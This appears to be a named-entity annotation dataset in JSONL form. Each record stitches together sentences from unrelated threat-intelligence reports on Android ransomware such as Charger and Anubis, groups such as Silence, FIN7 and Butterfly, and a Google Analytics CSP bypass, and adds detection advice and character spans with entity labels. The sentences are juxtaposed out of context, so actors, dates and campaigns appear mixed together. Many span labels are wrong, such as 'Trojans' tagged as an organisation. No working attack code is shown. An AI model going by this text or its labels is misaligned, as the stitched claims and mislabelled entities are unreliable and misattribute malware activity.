{"text": "Trend Micro \u2019 s Mobile App Reputation Service ( MARS ) covers Android and iOS threats using leading sandbox and machine learning technologies , protecting devices against malware , zero-day and known exploits , privacy leaks , and application vulnerabilities . Silence is a group of Russian-speaking hackers , based on their commands language , the location of infrastructure they used , and the geography of their targets ( Russia , Ukraine , Belarus , Azerbaijan , Poland , and Kazakhstan ) . At the end of 2018 , the cluster started to use not only CobaltStrike but also Powershell Empire in order to gain a foothold on the victims\u2019 networks . Monitor executed commands and arguments that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 16, "end": 45, "label": "System"}, {"start": 62, "end": 69, "label": "System"}, {"start": 74, "end": 77, "label": "System"}, {"start": 552, "end": 564, "label": "System"}, {"start": 574, "end": 584, "label": "System"}, {"start": 585, "end": 591, "label": "System"}]}
{"text": "Several weeks ago , Check Point Mobile Threat Prevention detected and quarantined the Android device of an unsuspecting customer employee who downloaded and installed a 0day mobile ransomware from Google Play dubbed \u201c Charger. \u201d This incident demonstrates how malware can be a dangerous threat to your business , and how advanced behavioral detection fills mobile security gaps attackers use to penetrate entire networks . Although Silence 's phishing emails were also sent to bank employees in Central and Western Europe , Africa , and Asia ) . After a successful penetration , it uses its own backdoors and the CobaltStrike framework or Powershell Empire components to hop to interesting parts of the network , where it can monetize its access . Monitor for newly constructed files that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 20, "end": 31, "label": "Organization"}, {"start": 86, "end": 93, "label": "System"}, {"start": 197, "end": 208, "label": "System"}, {"start": 218, "end": 226, "label": "Malware"}, {"start": 477, "end": 491, "label": "Organization"}, {"start": 613, "end": 625, "label": "System"}, {"start": 639, "end": 649, "label": "System"}, {"start": 650, "end": 656, "label": "System"}]}
{"text": "Charger was found embedded in an app called EnergyRescue . Silence also used Russian-language web hosting services . FIN7 \u2019s last campaigns were targeting banks in Europe and Central America . Monitor for contextual data about a file , which may include information such as name , the content ( ex : signature , headers , or data / media ) , user / ower , permissions that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 44, "end": 56, "label": "Malware"}, {"start": 94, "end": 114, "label": "System"}, {"start": 117, "end": 121, "label": "Organization"}]}
{"text": "The infected app steals contacts and SMS messages from the user \u2019 s device and asks for admin permissions . Financially motivated APT groups which focus efforts on targeted attacks on the financial sector such as \u2014 Anunak , Corkow , Buhtrap \u2014 usually managed botnets using developed or modified banking Trojans . This threat actor stole suspected of stealing \u20ac13 million from Bank of Valetta , Malta earlier this year . Monitor for changes made to files that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 188, "end": 204, "label": "Organization"}, {"start": 224, "end": 230, "label": "System"}, {"start": 295, "end": 302, "label": "Organization"}]}
{"text": "If granted , the ransomware locks the device and displays a message demanding payment : You need to pay for us , otherwise we will sell portion of your personal information on black market every 30 minutes . They tried new techniques to steal from banking systems , including AWS CBR ( the Russian Central Bank 's Automated Workstation Client ) , ATMs , and card processing . A few interesting overlaps in recent FIN7 campaigns : Both used macros to copy wscript.exe to another file , which began with \u201c ms \u201d ( mses.exe \u2013 FIN7 , msutil.exe \u2013 EmpireMonkey ) . Monitor for changes made to firewall rules for unexpected modifications to allow / block specific network traffic that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 298, "end": 342, "label": "Organization"}, {"start": 347, "end": 351, "label": "Organization"}, {"start": 413, "end": 417, "label": "Organization"}, {"start": 440, "end": 446, "label": "System"}, {"start": 455, "end": 466, "label": "Indicator"}, {"start": 511, "end": 519, "label": "Indicator"}, {"start": 522, "end": 526, "label": "Organization"}, {"start": 529, "end": 539, "label": "Indicator"}, {"start": 542, "end": 554, "label": "Malware"}]}
{"text": "WE GIVE 100 % GUARANTEE THAT ALL FILES WILL RESTORE AFTER WE RECEIVE PAYMENT . Group-IB researchers were tracking Silence throughout this period and conducting response following incidents in the financial sector . Both executed a JScript file named \u201c error \u201d in %TEMP% ( Errors.txt in the case of FIN7 , Errors.bat for EmpireMonkey ) . Monitor for API calls that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 79, "end": 87, "label": "Organization"}, {"start": 196, "end": 212, "label": "Organization"}, {"start": 231, "end": 238, "label": "System"}, {"start": 272, "end": 282, "label": "Indicator"}, {"start": 298, "end": 302, "label": "Organization"}, {"start": 305, "end": 315, "label": "Indicator"}, {"start": 320, "end": 332, "label": "Malware"}]}
{"text": "WE WILL UNLOCK THE MOBILE DEVICE AND DELETE ALL YOUR DATA FROM OUR SERVER ! Group-IB detected the first incidents relating to Silence in June 2016 . Both used DocuSign decoy documents with different macros . Monitor newly executed processes that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 76, "end": 84, "label": "Organization"}, {"start": 159, "end": 167, "label": "System"}, {"start": 199, "end": 205, "label": "System"}]}
{"text": "TURNING OFF YOUR PHONE IS MEANINGLESS , ALL YOUR DATA IS ALREADY STORED ON OUR SERVERS ! One of Silence 's first targets was a Russian bank , when they tried to attack AWS CBR . The macros popped the same \u201c Document decryption error \u201d error message\u2014even if macro code remain totally different . Monitor for any attempts to enable scripts running on a system would be considered suspicious .", "spans": [{"start": 135, "end": 139, "label": "Organization"}, {"start": 182, "end": 188, "label": "System"}, {"start": 257, "end": 262, "label": "System"}]}
{"text": "WE STILL CAN SELLING IT FOR SPAM , FAKE , BANK CRIME etc\u2026 We collect and download all of your personal data . They are selective in their attacks and wait for about three months between incidents , which is approximately three times longer than other financially motivated APT groups , like MoneyTaker , Anunak ( Carbanak ) , Buhtrap or Cobalt . We have a high level of confidence in a historic association between FIN7 and Cobalt , even though we believe that these two clusters of activity are operated by different teams . If scripts are not commonly used on a system , but enabled , scripts running out of cycle from patching or other administrator functions are suspicious .", "spans": [{"start": 415, "end": 419, "label": "Organization"}, {"start": 424, "end": 430, "label": "Malware"}]}
{"text": "All information about your social networks , Bank accounts , Credit Cards . Silence try to apply new techniques and ways of stealing from various banking systems , including AWS CBR , ATMs , and card processing . AveMaria is a new botnet , whose first version we found in September 2018 , right after the arrests of the FIN7 members . Scripts should be captured from the file system when possible to determine their actions and intent .", "spans": [{"start": 213, "end": 221, "label": "Malware"}, {"start": 320, "end": 324, "label": "Organization"}]}
{"text": "We collect all data about your friends and family . Silence 's successful attacks currently have been limited to the CIS and Eastern European countries . We have medium confidence that this botnet falls under the FIN7 umbrella . Monitor for newly constructed services / daemons that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 213, "end": 217, "label": "Organization"}]}
{"text": "The ransom demand for 0.2 Bitcoins ( roughly $ 180 ) is a much higher ransom demand than has been seen in mobile ransomware so far . He is responsible for developing tools for conducting attacks and is also able to modify complex exploits and third party software . In fact , AveMaria is a classic infostealer bot that collects all possible credentials from various types of software : browsers , email clients , messengers , etc. , and can act as a keylogger . Monitor for newly constructed user accounts that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 155, "end": 171, "label": "Malware"}, {"start": 215, "end": 238, "label": "Malware"}, {"start": 243, "end": 263, "label": "Malware"}, {"start": 276, "end": 284, "label": "Malware"}, {"start": 397, "end": 402, "label": "System"}]}
{"text": "By comparison , the DataLust ransomware demanded merely $ 15 . Silence 's main targets are located in Russia , Ukraine , Belarus , Azerbaijan , Poland , and Kazakhstan . Since the beginning of 2019 , we have collected more than 1300 samples and extracted more than 130 C2s . Monitor for contextual data about an account , which may include a username , user ID , environmental data that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 20, "end": 28, "label": "Malware"}]}
{"text": "Payments are made to a specific Bitcoin account , but we haven \u2019 t identified any payments so far . However , some phishing emails were sent to bank employees in more than 25 countries of Central and Western Europe , Africa and Asia including : Kyrgyzstan , Armenia , Georgia , Serbia , Germany , Latvia , Czech Republic , Romania , Kenya , Israel , Cyprus , Greece , Turkey , Taiwan , Malaysia , Switzerland , Vietnam , Austria , Uzbekistan , Great Britain , Hong Kong , and others . To deliver their malware , the cyber criminals use spearphishing emails with various types of attachments : MS Office documents or spreadsheet files exploiting some known vulnerability like CVE-2017-11882 , or documents with Ole2Link and SCT . Monitor for changes made to windows registry keys and/or values that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 32, "end": 39, "label": "System"}, {"start": 144, "end": 158, "label": "Organization"}, {"start": 550, "end": 556, "label": "System"}, {"start": 593, "end": 595, "label": "Organization"}, {"start": 596, "end": 602, "label": "System"}, {"start": 675, "end": 689, "label": "Vulnerability"}, {"start": 710, "end": 718, "label": "Vulnerability"}, {"start": 723, "end": 726, "label": "Vulnerability"}]}
{"text": "Adware commonly found on Play collects profits from ad networks , but mobile ransomware inflicts direct harm to users . In the same year , they conducted DDoS attacks using the Perl IRC bot and public IRC chats to control Trojans . They also use AutoIT droppers , password-protected EXE files and even ISO images . CSP can define a list of domains that the browser should be allowed to interact with for the visited URL .", "spans": [{"start": 177, "end": 189, "label": "System"}, {"start": 194, "end": 210, "label": "System"}, {"start": 246, "end": 252, "label": "System"}, {"start": 283, "end": 286, "label": "System"}, {"start": 302, "end": 305, "label": "System"}, {"start": 315, "end": 318, "label": "System"}]}
{"text": "Like FakeDefender and DataLust , Charger could be an indicator of a wider effort by mobile malware developers to catch up with their PC ransomware cousins . In the same year , Silence conducted DDoS attacks using the Perl IRC bot and public IRC chats to control Trojans . What is interesting , in some emails , they ask targets to phone them if they have any questions , like the FIN7 guys do . Designed to guard against XSS attacks , CSP helps control which domains can be accessed as part of a page and therefore restricts which domains to share data with .", "spans": [{"start": 5, "end": 17, "label": "Malware"}, {"start": 22, "end": 30, "label": "Malware"}, {"start": 33, "end": 40, "label": "Malware"}, {"start": 217, "end": 229, "label": "System"}, {"start": 234, "end": 250, "label": "System"}, {"start": 302, "end": 308, "label": "System"}, {"start": 380, "end": 384, "label": "Organization"}, {"start": 421, "end": 432, "label": "Organization"}, {"start": 435, "end": 438, "label": "System"}]}
{"text": "Similar to other malware seen in the past , Charger checks the local settings of the device and does not run its malicious logic if the device is located in Ukraine , Russia , or Belarus . In two months , the group returned to their proven method and withdrew funds again through ATMs . During the investigation into FIN7 , our threat-hunting systems found an interesting overlap in between the infrastructure of FIN7 and AveMaria . It even can restrict forms to be sent only to specific hosts , using the form - action directive .", "spans": [{"start": 44, "end": 51, "label": "Malware"}, {"start": 317, "end": 321, "label": "Organization"}, {"start": 413, "end": 417, "label": "Organization"}, {"start": 422, "end": 430, "label": "Malware"}]}
{"text": "This is likely done to keep the developers from being prosecuted in their own countries or being extradited between countries . In September 2017 , we discovered a new targeted attack on financial institutions . Basically , two servers in the same IP range and AS14576 ( autonomous system ) share a non-standard SSH port , which is 222 . These restrictions are specified by a list of allowed URIs .", "spans": [{"start": 187, "end": 209, "label": "Organization"}, {"start": 312, "end": 315, "label": "Indicator"}, {"start": 374, "end": 396, "label": "System"}]}
{"text": "Most malware found on Google Play contains only a dropper that later downloads the real malicious components to the device . In September 2017 , we discovered Silence attack on financial institutions . One of the servers is a Griffon C2, and the other one , an AveMaria C2 . By analyzing field data we see a gap in the implementation of CSP , and even for sites that do use it correctly , this creates an open window to exfiltrate data .", "spans": [{"start": 22, "end": 33, "label": "System"}, {"start": 177, "end": 199, "label": "Organization"}, {"start": 226, "end": 233, "label": "Malware"}, {"start": 261, "end": 269, "label": "Malware"}, {"start": 270, "end": 272, "label": "System"}, {"start": 306, "end": 340, "label": "Vulnerability"}, {"start": 356, "end": 361, "label": "System"}]}
{"text": "Charger , however , uses a heavy packing approach which it harder for the malware to stay hidden , so it must compensate with other means . The infection vector is a spear-phishing email with a malicious attachment . Distribution of targets is another factor suggesting that these two malware families may be connected . Our demonstration shows how using the Google Analytics API , a web skimmer can send data to be collected in his own account instance .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 359, "end": 379, "label": "System"}, {"start": 382, "end": 395, "label": "Organization"}]}
{"text": "The developers of Charger gave it everything they had to boost its evasion capabilities and so it could stay hidden on Google Play for as long as possible . An interesting point in the Silence attack is that the cybercriminals had already compromised banking infrastructure in order to send their spear-phishing emails from the addresses of real bank employees and look as unsuspicious as possible to future victims . We analyzed AveMaria targets during February and March of 2019 . As Google Analytics is allowed in the CSP configuration of many major sites , this demo shows how an attacker can bypass this security protection and steal data .", "spans": [{"start": 18, "end": 25, "label": "Malware"}, {"start": 119, "end": 130, "label": "System"}, {"start": 251, "end": 258, "label": "Organization"}, {"start": 346, "end": 360, "label": "Organization"}, {"start": 430, "end": 438, "label": "Malware"}, {"start": 486, "end": 502, "label": "System"}, {"start": 521, "end": 524, "label": "System"}, {"start": 584, "end": 592, "label": "Organization"}]}
{"text": "The malware uses several advanced techniques to hide its real intentions and makes it harder to detect . The spear-phishing infection vector is still the most popular way to initiate targeted campaigns . The spearphishing emails were sent to various kinds of businesses only and did not target individuals . Our gathered field data shows the following statistics on CSP usage across the Internet ( based on HTTPArchive March 2020 scan ):", "spans": [{"start": 222, "end": 228, "label": "System"}, {"start": 366, "end": 369, "label": "System"}, {"start": 387, "end": 395, "label": "System"}, {"start": 407, "end": 418, "label": "System"}]}
{"text": "It encodes strings into binary arrays , making it hard to inspect them . We conclude that the actor behind the attack is Silence group , a relatively new threat actor that's been operating since mid-2016 . Thirty percent of the targets were small and medium-sized companies that were suppliers or service providers for bigger players and 21% were various types of manufacturing companies . Looking at the top 3 M domains , only 210 K use CSP .", "spans": [{"start": 438, "end": 441, "label": "System"}]}
{"text": "It loads code from encrypted resources dynamically , which most detection engines can not penetrate and inspect . A preliminary analysis caught the attention of our Threat Analysis and Intelligence team as it yielded interesting data that , among other things , shows that Silence was targeting employees from financial entities , specifically in the Russian Federation and the Republic of Belarus . We also spotted several typical FIN7 targets , such as retailers and hotels . Most do n\u2019t even do much besides Since the most common allowed domain is google-analytics.com ( 17 K websites )", "spans": [{"start": 295, "end": 304, "label": "Organization"}, {"start": 310, "end": 328, "label": "Organization"}, {"start": 432, "end": 436, "label": "Organization"}, {"start": 551, "end": 571, "label": "Indicator"}]}
{"text": "The dynamically-loaded code is also flooded with meaningless commands that mask the actual commands passing through . As shown above , the threat runs several native binaries to collect useful information for its recon phase . Most AveMaria targets ( 72% ) were in the EU . We took google - analytics as an example , but other services can also be used .", "spans": [{"start": 159, "end": 174, "label": "System"}, {"start": 232, "end": 240, "label": "Malware"}, {"start": 269, "end": 271, "label": "Organization"}, {"start": 282, "end": 300, "label": "System"}]}
{"text": "It checks whether it is being run in an emulator before it starts its malicious activity . The intelligence we have collected shows that Silence is part of a more extensive operation , still focused on financial institutions operating mainly on Russian territory . At the end of 2018 , while searching for new FIN7 campaigns via telemetry , we discovered a set of activity that we temporarily called \u201c CopyPaste \u201d from a previously unknown APT . As an example , we took the twitter login page , which implemented the following CSP rule ( which contains ): The following short JS code inserted into the site will send the credentials to google - analytics console controlled by us : The UA-#######- # parameter is the tag ID owner that Google Analytics uses to connect the data to a specific account .", "spans": [{"start": 202, "end": 224, "label": "Organization"}, {"start": 310, "end": 314, "label": "Organization"}, {"start": 402, "end": 411, "label": "Organization"}, {"start": 527, "end": 530, "label": "System"}, {"start": 735, "end": 751, "label": "System"}]}
{"text": "PC malware first introduced this technique which is becoming a trend in mobile malware having been adopted by several malware families including Dendroid . These spearphishing attempts represent an evolution of Iranian actors based on their social engineering tactics and narrow targeting . Interestingly , this actor targeted financial entities and companies in one African country , which lead us to think that CopyPaste was associated with cybermercenaries or a training center . Instead of using twitter \u2019s google - analytic account , we used an account we control .", "spans": [{"start": 145, "end": 153, "label": "Malware"}, {"start": 413, "end": 422, "label": "Organization"}, {"start": 500, "end": 536, "label": "System"}]}
{"text": "Emulator and location conditions for the malware \u2019 s activity Check Point Mobile Threat Prevention customers are protected from Charger and similar malware . Based on file modification dates and timestamps of samples , it appears that the observed campaign was initiated in the middle of February 2016 , with the infrastructure taken offline at the start of March . This set of activity relied on open-source tools , such as Powershell Empire , and well-documented red teaming techniques , in order to get a foothold within the victim\u2019s networks and avoid detection . Unfortunately , the CSP policy ca n\u2019t discriminate based on the Tag ID .", "spans": [{"start": 62, "end": 73, "label": "Organization"}, {"start": 128, "end": 135, "label": "Malware"}, {"start": 425, "end": 435, "label": "System"}, {"start": 436, "end": 442, "label": "System"}, {"start": 588, "end": 591, "label": "System"}]}
{"text": "Check Point \u2019 s Analysis and Response Team ( ART ) disclosed the finding to Android \u2019 s Security team who took the appropriate security steps to remove the infected app and added the malware to Android \u2019 s built-in protection mechanisms . While the Sima moniker could similarly originate from software labels , it is a common female Persian name and a Persian-language word for \" visage \" or \" appearance \" . The links between CopyPaste and FIN7 are still very weak . Though Google meant to have this parameter be used to mention the page the user visited , we used it to exfiltrate the user name and password data encoded in base64 .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 76, "end": 83, "label": "System"}, {"start": 194, "end": 201, "label": "System"}, {"start": 427, "end": 436, "label": "Organization"}, {"start": 441, "end": 445, "label": "Organization"}, {"start": 475, "end": 481, "label": "Organization"}, {"start": 626, "end": 632, "label": "Indicator"}]}
{"text": "Charger SHA256 hash : 58eb6c368e129b17559bdeacb3aed4d9a5d3596f774cf5ed3fdcf51775232ba0 Infostealer , Keylogger , and Ransomware in One : Anubis Targets More than 250 Android Applications October 29 , 2021 The Cofense Phishing Defense Center uncovered a phishing campaign that specifically targets users of Android devices that could result in compromise if unsigned Android applications are permitted on the device . Given its use in more advanced social engineering campaigns against women 's rights activists , the label seem particularly apt . It is possible that the CopyPaste operators were influenced by open-source publications and do not have any ties with FIN7 . In our Google Analytics platform , we will see the data as : In our demo the DP will result in page view of Which will be decoded from base64 as : The source of the problem is that the CSP rule system is n\u2019t granular enough .", "spans": [{"start": 22, "end": 86, "label": "Indicator"}, {"start": 137, "end": 143, "label": "Malware"}, {"start": 166, "end": 173, "label": "System"}, {"start": 209, "end": 240, "label": "Organization"}, {"start": 306, "end": 313, "label": "System"}, {"start": 366, "end": 373, "label": "System"}, {"start": 448, "end": 476, "label": "Organization"}, {"start": 485, "end": 510, "label": "Organization"}, {"start": 571, "end": 580, "label": "Organization"}, {"start": 665, "end": 669, "label": "Organization"}, {"start": 679, "end": 704, "label": "System"}, {"start": 807, "end": 813, "label": "Indicator"}, {"start": 857, "end": 872, "label": "System"}]}
{"text": "The campaign seeks to deliver Anubis , a particularly nasty piece of malware that was originally used for cyber espionage and retooled as a banking trojan . Samples and resource names contained the family names of prominent Iranians , and several of these individuals received the malware located in their respective folder . During 2018 , Europol and DoJ announced the arrest of the leader of the FIN7 and Carbanak S-APT/CobaltGoblin cybercrime groups . Recognizing and stopping the above malicious JavaScript request requires advanced visibility solutions that can detect the access and exfiltration of sensitive user data ( in this case the user \u2019s email address and password ) .", "spans": [{"start": 30, "end": 36, "label": "Malware"}, {"start": 224, "end": 232, "label": "Organization"}, {"start": 340, "end": 347, "label": "Organization"}, {"start": 352, "end": 355, "label": "Organization"}, {"start": 398, "end": 402, "label": "Organization"}, {"start": 407, "end": 434, "label": "Organization"}]}
{"text": "Anubis can completely hijack an Android mobile device , steal data , record phone calls , and even hold the device to ransom by encrypting the victim \u2019 s personal files . The Sima group also engaged in impersonation of Citizenship and Immigration Services at the Department of Homeland Security , posing as a notice about the expiration of the recipient 's Permanent Residence status . It was believed that the arrest of the group leader will have an impact on the group\u2019s operations . One might think we could have updated the CSP to only allow specific TIDs : .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 32, "end": 39, "label": "System"}, {"start": 175, "end": 179, "label": "Organization"}, {"start": 219, "end": 230, "label": "Organization"}, {"start": 235, "end": 255, "label": "Organization"}, {"start": 263, "end": 294, "label": "Organization"}, {"start": 528, "end": 531, "label": "System"}]}
{"text": "With mobile devices increasingly used in the corporate environment , thanks to the popularity of BYOD policies , this malware has the potential to cause serious harm , mostly to consumers , and businesses that allow the installation of unsigned applications . In another case , Sima mirrored an announcement made about the broadcast of a television program on Iranian-American cultural affairs in order to impersonate the individual and engage in spearphishing within hours of the legitimate message . However , recent data seems to indicate that the attacks have continued without significant drawbacks . The problem is that CSP does n't support query strings ( See Spec ):", "spans": [{"start": 278, "end": 282, "label": "Organization"}, {"start": 626, "end": 629, "label": "System"}]}
{"text": "Here \u2019 s how it works : At first glance , the email shown in Figure 1 looks like any other phishing email that asks the user to download an invoice . The server used to host these malware samples was located on the German provider Hetzner ( 148.251.55.114 ) , within a small block of IP addresses that are registered with the customer ID \" HOS-156205 \" . One may say CobaltGoblin and FIN7 have even extended the number of groups operating under their umbrella . Having such a gap with the most commonly used domain allowed with CSP is a major risk indicator of the threats that can come from other domains that are used to serve multiple accounts .", "spans": [{"start": 222, "end": 230, "label": "Organization"}, {"start": 367, "end": 379, "label": "Organization"}, {"start": 384, "end": 388, "label": "Organization"}, {"start": 528, "end": 531, "label": "System"}, {"start": 532, "end": 646, "label": "Indicator"}]}
{"text": "However , this particular email downloads an Android Package Kit ( APK ) , which is the common format used by Android to distribute and install applications . All the samples appear to be have been compiled between February 29 and March 1 2016 , shortly before our discovery , suggesting that , despite the known C&C servers having quickly gone offline shortly after , this spree of attacks might be fresh and currently undergoing . We observe , with various level of confidence , that there are several interconnected groups using very similar toolkits and the same infrastructure to conduct their cyberattacks . A possible solution would come from adaptive URLs , adding the ID as part of the URL or subdomain to allow admins to set CSP rules that restrict data exfiltration to other accounts .", "spans": [{"start": 45, "end": 64, "label": "System"}, {"start": 110, "end": 117, "label": "System"}]}
{"text": "Let \u2019 s take a closer look at the suspicious file . These archives provide further indication that those entities behind the campaigns are Persian-language speakers , due to the naming of files and folders in Persian . The first of them is the well-known FIN7 , which specializes in attacking various companies to get access to financial data or PoS infrastructure . A more granular future direction for strengthening CSP direction to consider as part of the CSP standard is XHR proxy enforcement .", "spans": [{"start": 255, "end": 259, "label": "Organization"}, {"start": 346, "end": 349, "label": "System"}]}
{"text": "Figure 1 \u2013 Phishing Email When the email link is opened from an Android device , an APK file ( Fattura002873.apk ) , is downloaded . For the sake of narrative we are going to focus exclusively to those samples we identified being used in attacks against Iranian civil society and diaspora . They rely on a Griffon JS backdoor and Cobalt S-MAL/Meterpreter , and in recent attacks , Powershell Empire . This will essentially create a client - side WAF that can enforce a policy on where specific data field are allowed to be transmitted .", "spans": [{"start": 64, "end": 71, "label": "System"}, {"start": 95, "end": 112, "label": "Indicator"}, {"start": 262, "end": 275, "label": "Organization"}, {"start": 280, "end": 288, "label": "Organization"}, {"start": 306, "end": 313, "label": "Malware"}, {"start": 314, "end": 316, "label": "System"}, {"start": 330, "end": 354, "label": "System"}, {"start": 381, "end": 391, "label": "System"}, {"start": 392, "end": 398, "label": "System"}]}
{"text": "Upon opening the file , the user is asked to enable \u201c Google Play Protect \u201d as shown in Figure 2 . Butterfly has attacked multi-billion dollar companies operating in the internet , IT software , pharmaceutical , and commodities sectors . The second one is CobaltGoblin S-APT/Carbanak S-APT/EmpireMonkey , which uses the same toolkit , techniques and similar infrastructure but targets only financial institutions and associated software/services providers . In addition to the complexity of managing CSP rules , this vulnerability shows how widely used services such as Google Analytics can be subverted to bypass this protection .", "spans": [{"start": 54, "end": 65, "label": "System"}, {"start": 99, "end": 108, "label": "Organization"}, {"start": 122, "end": 152, "label": "Organization"}, {"start": 195, "end": 209, "label": "Organization"}, {"start": 216, "end": 235, "label": "Organization"}, {"start": 256, "end": 302, "label": "Organization"}, {"start": 473, "end": 509, "label": "Vulnerability"}, {"start": 517, "end": 530, "label": "Vulnerability"}, {"start": 570, "end": 586, "label": "System"}]}
{"text": "However , this is not a genuine \u201c Google Play Protect \u201d screen ; instead it gives the app all the permissions it needs while simultaneously disabling the actual Google Play Protect . The first signs of Butterfly 's activities emerged in early 2013 when several major technology and internet firms were compromised . We link the AveMaria botnet to these two groups with medium confidence : AveMaria \u2019s targets are mostly suppliers for big companies , and the way AveMaria manages its infrastructure is very similar to FIN7 . Over 5 years ago , we began tracking a new campaign that we called FakeUpdates ( also known as SocGholish ) that used compromised websites to trick users into running a fake browser update .", "spans": [{"start": 34, "end": 45, "label": "System"}, {"start": 161, "end": 180, "label": "System"}, {"start": 267, "end": 277, "label": "Organization"}, {"start": 282, "end": 296, "label": "Organization"}, {"start": 328, "end": 336, "label": "Malware"}, {"start": 389, "end": 397, "label": "Malware"}, {"start": 462, "end": 470, "label": "Malware"}, {"start": 517, "end": 521, "label": "Organization"}, {"start": 567, "end": 575, "label": "Organization"}, {"start": 591, "end": 602, "label": "Malware"}, {"start": 619, "end": 629, "label": "Malware"}]}
{"text": "Figure 2 \u2013 Granting Permissions The following permissions are granted to the app : Figure 3 \u2013 Permissions Granted to App A closer look at the code reveals the application gathers a list of installed applications to compare the results against a list of targeted applications ( Figure 4 ) . However , an investigation by Symantec has found that the group has been active since at least March 2012 and its attacks have not only continued to the present day , but have also increased in number . The last piece is the newly discovered CopyPaste group , who targeted financial entities and companies in one African country , which lead us to think that CopyPaste was associated with cybermercenaries or a training center . Instead , victims would end up infecting their computers with the NetSupport RAT , allowing threat actors to gain remote access and deliver additional payloads .", "spans": [{"start": 320, "end": 328, "label": "Organization"}, {"start": 532, "end": 541, "label": "Organization"}, {"start": 649, "end": 658, "label": "Organization"}, {"start": 729, "end": 736, "label": "Organization"}, {"start": 785, "end": 799, "label": "System"}]}
{"text": "The malware mainly targets banking and financial applications , but also looks for popular shopping apps such as eBay or Amazon . Symantec has to date discovered 49 different organizations in more than 20 countries that have been attacked by Butterfly . The links between CopyPaste and FIN7 are still very weak . As we have seen over the years , SocGholish is an established player that has managed to compromise countless victims and deliver ransomware after facilitating the installation of tools like Cobalt Strike or Mimikatz .", "spans": [{"start": 113, "end": 117, "label": "Organization"}, {"start": 121, "end": 127, "label": "Organization"}, {"start": 130, "end": 138, "label": "Organization"}, {"start": 272, "end": 281, "label": "Organization"}, {"start": 286, "end": 290, "label": "Organization"}, {"start": 346, "end": 356, "label": "Malware"}, {"start": 504, "end": 517, "label": "System"}, {"start": 521, "end": 529, "label": "System"}]}
{"text": "A full list of targeted applications is included in the IOC section at the end of this post . Aside from the four companies which have publicly acknowledged attacks , Symantec has identified five other large technology firms compromised by Butterfly , primarily headquartered in the US . It is possible that the operators of this cluster of activity were influenced by open-source publications and do not have any ties with FIN7 . The new campaign , which we call FakeSG , also relies on hacked WordPress websites to display a custom landing page mimicking the victim 's browser .", "spans": [{"start": 167, "end": 175, "label": "Organization"}, {"start": 208, "end": 224, "label": "Organization"}, {"start": 424, "end": 428, "label": "Organization"}, {"start": 439, "end": 447, "label": "Organization"}, {"start": 464, "end": 470, "label": "Malware"}, {"start": 488, "end": 513, "label": "System"}]}
{"text": "Once an application has been identified , Anubis overlays the original application with a fake login page to capture the user \u2019 s credentials . In the first attack , Butterfly gained a foothold by first attacking a small European office belonging to one firm and using this infection to then move on to its US office and European headquarters . All of the aforementioned groups greatly benefit from unpatched systems in corporate environments . The threat actors are distributing NetSupport RAT either as a zipped download or via an Internet shortcut .", "spans": [{"start": 42, "end": 48, "label": "Malware"}, {"start": 449, "end": 462, "label": "Organization"}, {"start": 480, "end": 494, "label": "System"}]}
{"text": "Figure 4 \u2013 Checking for installed apps Based on a thorough analysis of the code , the most interesting technical capabilities include : Capturing screenshots Enabling or changing administration settings Opening and visiting any URL Disabling Play Protect Recording audio Making phone calls Stealing the contact list Controlling the device via VNC Sending , receiving and deleting SMS Locking the device Encrypting files on the device and external drives Searching for files Retrieving the GPS location Capturing remote control commands from Twitter and Telegram Pushing overlays Reading the device ID The malware includes However , technology is not the only sector the group has focused on and Symantec has found evidence that Butterfly has attacked three major European pharmaceutical firms . They thus continue to use effective spearphishing campaigns in conjunction with well-known MS Office exploits generated by the framework . While FakeSG appears to be a newcomer , it uses different layers of obfuscation and delivery techniques that make it a threat to take seriously and which could potentially rival with SocGholish .", "spans": [{"start": 541, "end": 548, "label": "System"}, {"start": 553, "end": 561, "label": "System"}, {"start": 632, "end": 642, "label": "Organization"}, {"start": 695, "end": 703, "label": "Organization"}, {"start": 772, "end": 792, "label": "Organization"}, {"start": 886, "end": 888, "label": "Organization"}, {"start": 889, "end": 895, "label": "System"}, {"start": 940, "end": 946, "label": "Malware"}, {"start": 1117, "end": 1127, "label": "Malware"}]}
{"text": "a keylogger that works in every app installed on the Android device . Butterfly has also shown an interest in the commodities sector , attacking two major companies involved in gold and oil in late 2014 . So far , the groups have not used any zero-days . We first heard of this new campaign thanks to a Mastodon post by Randy McEoin .", "spans": [{"start": 53, "end": 60, "label": "System"}, {"start": 70, "end": 79, "label": "Organization"}, {"start": 114, "end": 132, "label": "Organization"}, {"start": 177, "end": 181, "label": "Organization"}, {"start": 186, "end": 189, "label": "Organization"}, {"start": 243, "end": 252, "label": "Vulnerability"}, {"start": 282, "end": 290, "label": "Organization"}, {"start": 303, "end": 311, "label": "Organization"}, {"start": 320, "end": 332, "label": "Organization"}]}
{"text": "However , the keylogger needs to be specifically enabled by a command sent from the C2 server . The company specializes in finance and natural resources specific to that region . FIN7 S-APT/Cobalt phishing documents may seem basic , but when combined with their extensive social engineering and focused targeting , they are quite successful . The tactics , techniques and procedures ( TTPs ) are very similar to those of SocGholish and it would be easy to think the two are related .", "spans": [{"start": 123, "end": 130, "label": "Organization"}, {"start": 179, "end": 196, "label": "Malware"}, {"start": 421, "end": 431, "label": "Malware"}]}
